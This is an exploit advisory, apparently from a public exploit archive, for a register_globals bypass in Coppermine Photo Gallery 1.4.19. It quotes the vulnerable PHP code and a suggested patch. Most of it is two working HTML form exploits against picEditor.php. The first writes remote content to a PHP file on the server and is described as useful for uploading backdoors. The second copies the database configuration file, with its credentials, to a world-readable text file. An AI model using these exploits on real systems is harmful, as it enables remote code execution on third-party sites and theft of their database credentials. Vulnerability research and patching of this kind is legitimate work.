Written By Michael Brooks
Special thanks to str0ke!


Coppermine Photo gallery - Remote PHP File Upload
Affects: v1.4.19
Homepage: http://coppermine-gallery.net/
5,239,057   downloads from sf.net!

For this attack we need register_globals=on .  The problem is that
the anti-register_globals security can be bypassed.

This is in /include/init.inc.php  starting on line 42:
$keysToSkip = array('_POST', '_GET', '_COOKIE', '_REQUEST', '_SERVER', 'HTML_SUBST');
//...
        if (is_array($_POST)) {
                foreach ($_POST as $key => $value) {
                        if (!is_array($value))
                                $_POST[$key] = strtr($value, $HTML_SUBST);
                        if (!in_array($key, $keysToSkip) && isset($$key) && ini_get('register_globals') == '1') unset($$key);
                }
        }

        if (is_array($_GET)) {
                foreach ($_GET as $key => $value) {
                        unset($_GET[$key]);
                        $_GET[strtr(stripslashes($key), $HTML_SUBST)] = strtr(stripslashes($value), $HTML_SUBST);
                        if (!in_array($key, $keysToSkip) && isset($$key) && ini_get('register_globals') == '1') unset($$key);
                }
        }

        if (is_array($_COOKIE)) {
                foreach ($_COOKIE as $key => $value) {
                        if (!in_array($key, $keysToSkip) && isset($$key) && ini_get('register_globals') == '1') unset($$key);
                }
        }
        if (is_array($_REQUEST)) {
                foreach ($_REQUEST as $key => $value) {
                        if (!is_array($value))
                                $_REQUEST[$key] = strtr($value, $HTML_SUBST);
                        if (!in_array($key, $keysToSkip) && isset($$key) && ini_get('register_globals') == '1') unset($$key);
                }
        }
	//...
	
Here is a patch that will take care of register_globals.
if(ini_get(register_globals)){
	foreach(get_defined_vars() as $var=>$val){
		//only keep superglobals we need on this whitelist,  _SESSION will take care of its self:
		if(!in_array($var,array('_POST', '_GET', '_COOKIE', '_REQUEST', '_SERVER'))){
			unset($$var);
		}
	}
}


These 2 exploits are written in HTM,   but they are NOT XSRF!  This is
a global variable manipulation issue,  you can exploit this with CURL
or whatever.

This will copy www.google.com  to
http://127.0.0.1/cpg1419/albums/test.php .  This is very useful for
uploading backdoors.
This is hijacking  a call to copy() so we need allow_url_fopen=On ,
which is default.
<html>
	<form action="http://127.0.0.1/cpg1419/picEditor.php?img_dir=http%3A%2F%2Fwww.google.com&CURRENT_PIC[filename]=/test.php"
method=post>
		<input name="save" value=1>
		<input name="keysToSkip" value=1>
		<input name="_GET" value=1>
		<input name="_REQUEST" value=1>
		<input type=submit>
	</form>
</html>


This request will copy the database connection info and make it readable here:
http://10.1.1.155/Audit/cpg1419/albums/dbinfo.txt
This attack works with allow_url_fopen=Off
<html>
	<form action="http://127.0.0.1/cpg1419/picEditor.php?img_dir=include/config.inc.php&CURRENT_PIC[filename]=/dbinfo.txt"
method=post>
		<input name="save" value=1>
		<input name="keysToSkip" value=1>
		<input name="_GET" value=1>
		<input name="_REQUEST" value=1>
		<input type=submit>
	</form>
</html>